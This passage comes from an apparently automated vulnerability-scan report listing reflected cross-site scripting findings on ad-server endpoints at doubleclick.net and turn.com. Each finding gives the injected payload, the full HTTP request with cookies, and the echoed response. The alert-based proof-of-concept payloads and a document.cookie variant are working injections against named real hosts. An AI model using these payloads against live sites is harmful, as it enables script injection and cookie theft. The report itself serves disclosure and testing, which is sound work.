User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 371
Date: Mon, 13 Jun 2011 11:23:55 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/c;44306;0-0;0;35460738;4307-300/250;0/0/0;;~okv=;ptile=9;sz=300x250;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku;;9e201'-alert(1)-'d992d7999dd=1;~aopt=2/0/23/0;~sscs=%3f">
...[SNIP]...

4.33. http://ad.doubleclick.net/adj/gm.kotaku/pc [ptile parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/pc

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7dc'%3balert(1)//92389b75efb was submitted in the ptile parameter. This input was echoed as 5b7dc';alert(1)//92389b75efb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/gm.kotaku/pc;ptile=5b7dc'%3balert(1)//92389b75efb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:50 GMT
Expires: Mon, 13 Jun 2011 11:23:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/i;44306;0-0;0;35460738;8058-82/50;0/0/0;;~okv=;ptile=5b7dc';alert(1)//92389b75efb;~aopt=2/0/23/0;~sscs=%3f"><
...[SNIP]...

4.34. http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/oiq.rmx/

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bf9'-alert(1)-'58be3394590 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/oiq.rmx/;click0=45bf9'-alert(1)-'58be3394590 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:20:12 GMT
Expires: Mon, 13 Jun 2011 11:20:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/14/1c/%2a/k;227869823;0-0;0;40342997;4307-300/250;37969296/37987053/1;;~sscs=%3f45bf9'-alert(1)-'58be3394590http://owneriq.com/advertisers?src=300x250_blue">
...[SNIP]...

4.35. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91fc2"><script>alert(1)</script>25500fb9c25 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=91fc2"><script>alert(1)</script>25500fb9c25&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=-7D3jhve-_dqBXor_KGJlXkh6uMLiJASzHFQS38JXoTG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ9aseWXXyEg6ngdmdtCJ98TaaCzQk38mLAksW0DqSbPYbySfUM3MRmwu87R_bnrJOV4gv5uh11F4sQPDcy793aXQyWberVE7H9dGuTlyTFp3RaUANT5eBsokdVPtiFhbZlnsCNKZNegbrth_D7SWf8-GRakhudMFH92bLqvo7whZCttHGvuJqzUmN3TCnRRWA9RzbA2m8y8-md7vvpCypQN__nnhKkgreG7OSDcaZV8DtILSxhIqj1_8W_b-sPL2rmo28BWvcjGNUxT50RKm6bHeo49rmT7jj-OFCxy7LUUTGOKwgYTlqkzoPyBtxx8IAv5QN-B4qn85KrWNXkRxjrbOKBw1n7GMckFqA6EpnplKzaOHG6TZ2deht-u0YLfBKH6Pa-p1gEeo6-aXDdZFMAmjhzhGEdbwvglvH0-24dOZTOW2rPb1SgA4pngxLGaQQtnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlLz4BQlJ6csz8dB0J_8c8Ka0J_7oKjjzxbQbmixkRIYsAMcBeVd41aCv5NIHe_tLft3hmpmMKAwSnUY_W2vbKxi5DYHhi24I8waLdyGYBf3-MaTnGr8K_HGinZrBfbZveONlgZZNIb4imigs__tVs5_-ofKtZ6hXXSZpdwBNj6GJboI-S1pQlAm9WAm2qWReCcDoZ7E02XMENjv3ClnVh50sfKj_XnOycnqr1f-q8U8AE4G03BTk0fzq7l2lZkr8VkAgj7Wkf7Z-tgLIpA1wB2yzoRrgUiaRdOvE17AKUsymItYwTHyhwXAUBXi6D6PqPXyEGeO1Zz6qPU8NhJ7wMtVPQFf5dsx4yIMgZcA57lrmBiIHuEACwgcsGnk3f55POjRgsWdgnGrl2gT_wrbiSH9GS32-3vC2xqxP7e5vHxFUGj7jmQul9hhXiSWuClGE3RPf0vY5j10d73GHcIzZGN7ew5Q1a2Jatefo_kPZe9ev4zG24J2Kc93KYfJqWJL5G-XhStGducGUCpASNzOmiggs84qnGaLTJJhRTIpFjT7WIs2Qp4sZFseTH4XqopbjkCcflfgayr40dr4ggTgLxRYlq-sDEfjhI0bEAhsL4dT5tAwWq2UVacc2NOW6nmLabkc3sJNc7e1BoJUkxklm2VAglnp_rMWjHAhM9k1KaSm8OWsPIHPqgUorS3Sa63Z4dXkNgeGLbgjzBot3IZgF_f43q0orUcCB1pzamJnrHZbwDgKuBt10k4qS0Y4XqmheDZzWncGPQ-obDcn4rklvspcF4T1MvNY3wH8WmfBVBADewOhnsTTZcwQ2O_cKWdWHnRHnW0MvCAdVOvB_H5-CgFPTgbTcFOTR_OruXaVmSvxWaotkZUMh8YO2CDHSkuQHNvpYL9IxVdLMAO0ccWwxLTWi1jBMfKHBcBQFeLoPo-o9Ug56BpCRUAZFpmVCXZ3Qd10ruuV1lK6btQ_JxbV8gRwSuoy0wOsY4RyZOeRLXa79L_0UruZ7SQ7nDOH3_UpK9C1uwMA7iZtQ-ABBZnlRLpDLQa3T1jvMzxa6vvkjDgWIUGmyDGPkmTeStGjtZLZBTYqFNU9MJ5YE_zpkKWEn7owTls_2Ri7Iyye7TGUfqeyZ5eFK0Z25wZQKkBI3M6aKCA6vC23uVfJ0RdBdeAtvHyQizZCnixkWx5MfheqiluOQGlg-ItAIsZxzqSPRpmEAmoRmAytNEC5X_1tKtPKPo9q_E6bbLezcAxfHFhLtj9YhI3avFK_HA-CwpQ_ryY3RW2I4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIdyIarOzLznCpjY3H8bdib18klrWFfTp2Nb1WaOVWuPLHxJelnxED3MVl_uERX9gK5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4i5vLq95iSQ2aeieaQBbTOIlboYXPkW8MWo4rGR69X3pWLxNksW9701Q8uH9_xMEPefznIrlo3WqyPN2D7Ebz9IitcUhJWLMqI_ZYtAMVlGLMrXFISVizKiP2WLQDFZRizK1xSElYsyoj9li0AxWUYsytcUhJWLMqI_ZYtAMVlGLMaPnwPi2iKD7qRkIeSQCAppTiYieerdsyfHnQplwsVNkkPGTOkzPwCUhGIeJybbU25tEjavJfHgFGxLIy_cdxU; fc=mVeMhp7-ld4_XVGY83oSyV3hWUCDbGhmmT9X_UI3cPCqlZbi8OtpyiRwC3bGcdNYqLcvXewLkRbbhMxP5KrQ6js1B_gXcB-qUuts5vF-XAQJlqbR_nvs1sBCEK8H0zsggHYjhoCFjnYm98tOIGVnz9yTqQnfFF8yP7lyDdApkMNbSdeeg1n_QtTgQFvfHLFQT9zwFbWJbyuxwzjlcHRJHBCWkGjVFo180HpWwPYRgVebRjcEB4F4-tbn-dbadQ3U2hGJYNwpXrvgU2zjApqVDS_ZolmR3JdiZaysD2zF72o; pf=KIMUptIal9Nliw08sJTQpzrAikl_fVScFd4qmGyTXES6o4VUW939ncJz_M9dzB62UmrMBVMpgSsIblFazRSHFvyNJGSTFQowtlkWEXspEEWyUA8lyShqTNjLCWmR35lQAe0q7YBFq60qdkok49Ub4icsZdLX4b0PU7FeYXqY03oQHhICh13Elq4vwAwd9rb_XWux54k9t4WxZeFvO_AmtBGWCx2R5xgPC_s5kwxYv523cpL3MMGZNZjM0sSgc3mUjHLQ52r_73tBHOt9AwJrvZSqu2QLfhe55HtMHLH7N4dkI6rwS_FFgauEgoqML85x-1Q3I8oslvAtuyyBsRV6-fzGtf-psK3vfYzM0TUbrRG6q-YPtF8T5YI7kk_i1ZmwdQvGUDdnJ9Q7wqHvVSgCUe7QnJne7ClW0JjJrTY14UTX0rL3iR-kLOOVUOxvehKvsHdHnq4okb07IhP8RrNrcwgNI19g506sy3_lUJPsfl8CGpZK0GFVXeLagp8b1KheELIeEizlDhW6ALtV-GQktuNrQgY57q_B3M-YWTk5qHl07ZpIsC5rrDcwqi2ouvVPptSDGP-GxrCvh-LDjgUd8ZWn7eX_qShrxTbEz_JoQSgkazJjbqogOCGJzp2JwtRxDWW37YD88Oq2q3BJWHMgKp-8bXaWq_ZlUx6tQG9MYgzWnuhICg6DCwbzB8f7O2jIvbxrd5gRo7UNJEp0C8RZD92mAEbpo7VKVZrCc_AFXuEw4VIHl-z6HMGQRzQICMRhyuiZtIpWBYJtFLLA7SWXOYEU1_XIPwT1jfR4VPfRTv6qsLf6D_fnIicUB0pybsIJ2dSqszIzCHMknU-DzVWrNDFM0eGdpjiZO9Ug6jvGBWHuwWjoa3XnE-vhUMqDroQX2i6VQ6o_vJB_s4peYdQHY3PMMUyh2TsgW_znILL-KMVz13JtznmvyeJM_Daav9q-XnC1B7eE2tx0YggEyRGivFBamygjHG5s3uqc4ZO0Su8slXBOHELwL_WMS1ltJh96VLEo5_Rdhy_O_2EbMTxTAB0QzSJLUYL8bvwf_ltWWx49gVG3YRVwjUzsS8cC9tu6PidGJMqmtISA_uBS2GO5emL721cN01WezRNF3l2Jos_32v1JcRdapCworTlW2GnMExs5_u_TEM0IsgE042YcjSnppdr0odeZIIibPByrMIei80W5BDQQmmuXn2BLK2L9VtuwCf0POxmlxjYSO1lO1I6hKPYFh4mC6TZ40m4ac8DKhk2RFegnRLefeZzr8xfHFa7v9HA91JbM5tgynojFu8fmABjZRVBOjbBfTb6Ls-mWBj_6dVFVYBPegaB9ftcm142azN2X6FZLfxHmAJn-TJniBnp3df3A41qYmrDHKEZZ3bqhSTU4dzKj-8nCSiEIK8MjEnLFmwlewonlU5AzOKYGFzmSaC07WQoOi1NX0_sHM7t1P_oDF3ijSQ_b3u4oeJKmVFGrK9unqqF0v5SN3KLim53Jf3v8Px0gg3kgqLE88BFAvW1TPuVrz5YTyJR7pzkVyYP8gQOuOeXedZf-9w; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

4.36. http://ad.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d38b"><script>alert(1)</script>52781f3e18 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=1d38b"><script>alert(1)</script>52781f3e18 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=-7D3jhve-_dqBXor_KGJlXkh6uMLiJASzHFQS38JXoTG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ9aseWXXyEg6ngdmdtCJ98TaaCzQk38mLAksW0DqSbPYbySfUM3MRmwu87R_bnrJOV4gv5uh11F4sQPDcy793aXQyWberVE7H9dGuTlyTFp3RaUANT5eBsokdVPtiFhbZlnsCNKZNegbrth_D7SWf8-GRakhudMFH92bLqvo7whZCttHGvuJqzUmN3TCnRRWA9RzbA2m8y8-md7vvpCypQN__nnhKkgreG7OSDcaZV8DtILSxhIqj1_8W_b-sPL2rmo28BWvcjGNUxT50RKm6bHeo49rmT7jj-OFCxy7LUUTGOKwgYTlqkzoPyBtxx8IAv5QN-B4qn85KrWNXkRxjrbOKBw1n7GMckFqA6EpnplKzaOHG6TZ2deht-u0YLfBKH6Pa-p1gEeo6-aXDdZFMAmjhzhGEdbwvglvH0-24dOZTOW2rPb1SgA4pngxLGaQQtnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlLz4BQlJ6csz8dB0J_8c8Ka0J_7oKjjzxbQbmixkRIYsAMcBeVd41aCv5NIHe_tLft3hmpmMKAwSnUY_W2vbKxi5DYHhi24I8waLdyGYBf3-MaTnGr8K_HGinZrBfbZveONlgZZNIb4imigs__tVs5_-ofKtZ6hXXSZpdwBNj6GJboI-S1pQlAm9WAm2qWReCcDoZ7E02XMENjv3ClnVh50sfKj_XnOycnqr1f-q8U8AE4G03BTk0fzq7l2lZkr8VkAgj7Wkf7Z-tgLIpA1wB2yzoRrgUiaRdOvE17AKUsymItYwTHyhwXAUBXi6D6PqPXyEGeO1Zz6qPU8NhJ7wMtVPQFf5dsx4yIMgZcA57lrmBiIHuEACwgcsGnk3f55POjRgsWdgnGrl2gT_wrbiSH9GS32-3vC2xqxP7e5vHxFUGj7jmQul9hhXiSWuClGE3RPf0vY5j10d73GHcIzZGN7ew5Q1a2Jatefo_kPZe9ev4zG24J2Kc93KYfJqWJL5G-XhStGducGUCpASNzOmiggs84qnGaLTJJhRTIpFjT7WIs2Qp4sZFseTH4XqopbjkCcflfgayr40dr4ggTgLxRYlq-sDEfjhI0bEAhsL4dT5tAwWq2UVacc2NOW6nmLabkc3sJNc7e1BoJUkxklm2VAglnp_rMWjHAhM9k1KaSm8OWsPIHPqgUorS3Sa63Z4dXkNgeGLbgjzBot3IZgF_f43q0orUcCB1pzamJnrHZbwDgKuBt10k4qS0Y4XqmheDZzWncGPQ-obDcn4rklvspcF4T1MvNY3wH8WmfBVBADewOhnsTTZcwQ2O_cKWdWHnRHnW0MvCAdVOvB_H5-CgFPTgbTcFOTR_OruXaVmSvxWaotkZUMh8YO2CDHSkuQHNvpYL9IxVdLMAO0ccWwxLTWi1jBMfKHBcBQFeLoPo-o9Ug56BpCRUAZFpmVCXZ3Qd10ruuV1lK6btQ_JxbV8gRwSuoy0wOsY4RyZOeRLXa79L_0UruZ7SQ7nDOH3_UpK9C1uwMA7iZtQ-ABBZnlRLpDLQa3T1jvMzxa6vvkjDgWIUGmyDGPkmTeStGjtZLZBTYqFNU9MJ5YE_zpkKWEn7owTls_2Ri7Iyye7TGUfqeyZ5eFK0Z25wZQKkBI3M6aKCA6vC23uVfJ0RdBdeAtvHyQizZCnixkWx5MfheqiluOQGlg-ItAIsZxzqSPRpmEAmoRmAytNEC5X_1tKtPKPo9q_E6bbLezcAxfHFhLtj9YhI3avFK_HA-CwpQ_ryY3RW2I4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIdyIarOzLznCpjY3H8bdib18klrWFfTp2Nb1WaOVWuPLHxJelnxED3MVl_uERX9gK5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4i5vLq95iSQ2aeieaQBbTOIlboYXPkW8MWo4rGR69X3pWLxNksW9701Q8uH9_xMEPefznIrlo3WqyPN2D7Ebz9IitcUhJWLMqI_ZYtAMVlGLMrXFISVizKiP2WLQDFZRizK1xSElYsyoj9li0AxWUYsytcUhJWLMqI_ZYtAMVlGLMaPnwPi2iKD7qRkIeSQCAppTiYieerdsyfHnQplwsVNkkPGTOkzPwCUhGIeJybbU25tEjavJfHgFGxLIy_cdxU; fc=mVeMhp7-ld4_XVGY83oSyV3hWUCDbGhmmT9X_UI3cPCqlZbi8OtpyiRwC3bGcdNYqLcvXewLkRbbhMxP5KrQ6js1B_gXcB-qUuts5vF-XAQJlqbR_nvs1sBCEK8H0zsggHYjhoCFjnYm98tOIGVnz9yTqQnfFF8yP7lyDdApkMNbSdeeg1n_QtTgQFvfHLFQT9zwFbWJbyuxwzjlcHRJHBCWkGjVFo180HpWwPYRgVebRjcEB4F4-tbn-dbadQ3U2hGJYNwpXrvgU2zjApqVDS_ZolmR3JdiZaysD2zF72o; pf=KIMUptIal9Nliw08sJTQpzrAikl_fVScFd4qmGyTXES6o4VUW939ncJz_M9dzB62UmrMBVMpgSsIblFazRSHFvyNJGSTFQowtlkWEXspEEWyUA8lyShqTNjLCWmR35lQAe0q7YBFq60qdkok49Ub4icsZdLX4b0PU7FeYXqY03oQHhICh13Elq4vwAwd9rb_XWux54k9t4WxZeFvO_AmtBGWCx2R5xgPC_s5kwxYv523cpL3MMGZNZjM0sSgc3mUjHLQ52r_73tBHOt9AwJrvZSqu2QLfhe55HtMHLH7N4dkI6rwS_FFgauEgoqML85x-1Q3I8oslvAtuyyBsRV6-fzGtf-psK3vfYzM0TUbrRG6q-YPtF8T5YI7kk_i1ZmwdQvGUDdnJ9Q7wqHvVSgCUe7QnJne7ClW0JjJrTY14UTX0rL3iR-kLOOVUOxvehKvsHdHnq4okb07IhP8RrNrcwgNI19g506sy3_lUJPsfl8CGpZK0GFVXeLagp8b1KheELIeEizlDhW6ALtV-GQktuNrQgY57q_B3M-YWTk5qHl07ZpIsC5rrDcwqi2ouvVPptSDGP-GxrCvh-LDjgUd8ZWn7eX_qShrxTbEz_JoQSgkazJjbqogOCGJzp2JwtRxDWW37YD88Oq2q3BJWHMgKp-8bXaWq_ZlUx6tQG9MYgzWnuhICg6DCwbzB8f7O2jIvbxrd5gRo7UNJEp0C8RZD92mAEbpo7VKVZrCc_AFXuEw4VIHl-z6HMGQRzQICMRhyuiZtIpWBYJtFLLA7SWXOYEU1_XIPwT1jfR4VPfRTv6qsLf6D_fnIicUB0pybsIJ2dSqszIzCHMknU-DzVWrNDFM0eGdpjiZO9Ug6jvGBWHuwWjoa3XnE-vhUMqDroQX2i6VQ6o_vJB_s4peYdQHY3PMMUyh2TsgW_znILL-KMVz13JtznmvyeJM_Daav9q-XnC1B7eE2tx0YggEyRGivFBamygjHG5s3uqc4ZO0Su8slXBOHELwL_WMS1ltJh96VLEo5_Rdhy_O_2EbMTxTAB0QzSJLUYL8bvwf_ltWWx49gVG3YRVwjUzsS8cC9tu6PidGJMqmtISA_uBS2GO5emL721cN01WezRNF3l2Jos_32v1JcRdapCworTlW2GnMExs5_u_TEM0IsgE042YcjSnppdr0odeZIIibPByrMIei80W5BDQQmmuXn2BLK2L9VtuwCf0POxmlxjYSO1lO1I6hKPYFh4mC6TZ40m4ac8DKhk2RFegnRLefeZzr8xfHFa7v9HA91JbM5tgynojFu8fmABjZRVBOjbBfTb6Ls-mWBj_6dVFVYBPegaB9ftcm142azN2X6FZLfxHmAJn-TJniBnp3df3A41qYmrDHKEZZ3bqhSTU4dzKj-8nCSiEIK8MjEnLFmwlewonlU5AzOKYGFzmSaC07WQoOi1NX0_sHM7t1P_oDF3ijSQ_b3u4oeJKmVFGrK9unqqF0v5SN3KLim53Jf3v8Px0gg3kgqLE88BFAvW1TPuVrz5YTyJR7pzkVyYP8gQOuOeXedZf-9w; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

